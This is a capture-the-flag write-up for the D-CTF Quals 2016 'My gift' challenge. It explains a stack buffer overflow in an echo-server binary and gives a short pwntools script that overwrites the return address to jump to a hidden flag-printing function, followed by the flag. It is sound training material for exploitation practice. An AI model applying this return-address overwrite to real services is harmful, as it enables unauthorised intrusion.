D-CTF Quals 2016: My gift (Exploit 200)

Description

10.13.37.22:1337
https://dctf.def.camp/quals-2016/exp200.bin

Exploit

This is a straightforward echo server with a bare buffer overflow vulnerability. Stack canary is not enable, and there is even a hidden print-flag function in the binary. So, just overflow the return address and jump to the target in the old-school fashion. To trigger the ret, we need to enter a string whose position 0, 1, 2, 4 are s, t, o, p respectively.

1
2
3
4
5
6
7
8
9
10
11
12
13
14

from pwn import *
from time import sleep

gift = 0x400B90

r = remote('10.13.37.22', 1337)

r.send('A'*104 + p64(gift))
sleep(0.1)
print repr(r.recv())
sleep(2)
r.send('stoop')
sleep(1)
print repr(r.recv())

Flag: DCTF{53827349d071f72d5cbcc37d3a14ca39}